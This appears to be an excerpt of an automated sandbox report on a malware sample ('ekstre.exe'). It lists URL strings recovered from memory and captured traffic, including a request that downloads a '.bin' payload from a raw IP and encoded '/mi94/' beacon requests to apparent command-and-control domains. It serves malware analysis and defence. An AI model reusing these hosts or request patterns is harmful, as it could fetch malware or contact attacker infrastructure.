Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000002.00000003.2583516689.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599197280.00000000101EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101985527.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5880695633.00000000101F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: schema-639-5.json.0.dr	String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: ekstre.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ekstre.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000002.5859546465.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1070966849.0000000000480000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5837946878.0000000000480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 00000002.00000000.1091461634.000000000D3C6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5873824982.000000000D3C6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000002.00000002.5859546465.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000918B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/l
Source: explorer.exe, 00000002.00000003.2583516689.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599197280.00000000101EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101985527.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5880695633.00000000101F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000002.5859546465.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2584948528.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101360354.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5879664198.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599423409.0000000010166000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000002.00000002.5873824982.000000000D478000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D478000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2589567062.000000000D478000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000003.2593638979.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000002.00000000.1091461634.000000000D35E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2584948528.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101360354.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5873824982.000000000D378000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2589567062.000000000D377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599423409.0000000010166000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000002.00000002.5863356889.000000000A030000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1088387269.000000000A240000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5846699157.0000000002290000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000002.5882418630.0000000010321000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2582906527.000000001031C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microso
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.com/mi94/www.textare.net
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bellvaniamail.comReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.couragetokingdom.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.couragetokingdom.com/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.couragetokingdom.com/mi94/www.luivix.online
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.couragetokingdom.comReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.uk/mi94/www.bellvaniamail.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crosswalkconsulting.co.ukReferer:
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doctorlinkscsk.link
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doctorlinkscsk.link/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doctorlinkscsk.link/mi94/www.couragetokingdom.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doctorlinkscsk.link/mi94/www.irestoreart.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.doctorlinkscsk.linkReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fluffyjet.online
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fluffyjet.online/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fluffyjet.online/mi94/www.crosswalkconsulting.co.uk
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fluffyjet.online/mi94/www.leqidt.tax
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fluffyjet.onlineReferer:
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fornettobarbecues.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fornettobarbecues.com/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fornettobarbecues.com/mi94/www.doctorlinkscsk.link
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.fornettobarbecues.comReferer:
Source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: ekstre.exe, 00000001.00000001.981438331.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.irestoreart.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.irestoreart.com/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.irestoreart.com/mi94/www.tmcgroup.africa
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.irestoreart.comReferer:
Source: explorer.exe, 00000002.00000002.5885519379.0000000012B3F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5852945332.000000000384F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.laxmi.digital
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.laxmi.digital/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.laxmi.digital/mi94/www.fornettobarbecues.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.laxmi.digitalReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leqidt.tax
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leqidt.tax/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leqidt.tax/mi94/www.textare.net
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.leqidt.taxReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.online
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.online/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.online/mi94/www.fluffyjet.online
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.luivix.onlineReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterslawonline.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterslawonline.com/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterslawonline.com/mi94/www.doctorlinkscsk.link
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.peterslawonline.comReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.textare.net
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.textare.net/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.textare.net/mi94/www.laxmi.digital
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.textare.net/mi94/www.peterslawonline.com
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.textare.netReferer:
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africa
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africa/mi94/
Source: explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tmcgroup.africaReferer:
Source: ekstre.exe, 00000001.00000001.981438331.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ekstre.exe, 00000001.00000001.981438331.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: explorer.exe, 00000002.00000003.2593638979.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppe
Source: explorer.exe, 00000002.00000000.1070966849.0000000000489000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5837946878.0000000000489000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000003.2593638979.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000CFC6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSs
Source: explorer.exe, 00000002.00000003.2589567062.000000000D485000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D485000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000003.2589567062.000000000D485000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D485000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/%T
Source: explorer.exe, 00000002.00000000.1091461634.000000000D056000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?V
Source: explorer.exe, 00000002.00000003.2589567062.000000000D485000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1082173915.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000D2F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D2F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000D2F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D485000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000003.2593638979.000000000D037000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D037000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000D037000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?:
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1091461634.000000000D056000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000D056000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5868063058.000000000D056000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?(
Source: explorer.exe, 00000002.00000002.5859546465.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000918B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000003.2586747502.0000000010137000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/
Source: explorer.exe, 00000002.00000002.5880299606.00000000101D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2586747502.0000000010137000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mx
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 00000002.00000000.1101985527.00000000101D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2583516689.00000000101E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000002.00000000.1082173915.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 00000002.00000000.1082173915.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008F3E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.1082173915.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5857340568.0000000008FF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comst
Source: explorer.exe, 00000002.00000003.2585108263.000000000D616000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.cn/shellRESP
Source: explorer.exe, 00000002.00000003.2585108263.000000000D616000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com/shell
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000002.00000000.1091461634.000000000CEE8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2593638979.000000000CEF1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000002.00000002.5861196060.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2592741948.000000000D569000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000929E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2585344883.000000000D51C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1091461634.000000000D51C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5876464954.000000000D562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2591448383.000000000D561000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, explorer.exe, 00000002.00000000.1070966849.0000000000542000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101985527.00000000101AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5880299606.00000000101AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5837946878.0000000000542000.00000004.00000020.00020000.00000000.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000002.00000000.1078901792.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5853522961.0000000004CF8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: www.couragetokingdom.com

Source: global traffic	HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2 HTTP/1.1Host: www.couragetokingdom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&-Z=6lfDx HTTP/1.1Host: www.canadianbreederprogram.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN HTTP/1.1Host: www.funtime28.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&-Z=6lfDx HTTP/1.1Host: www.bizformspro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
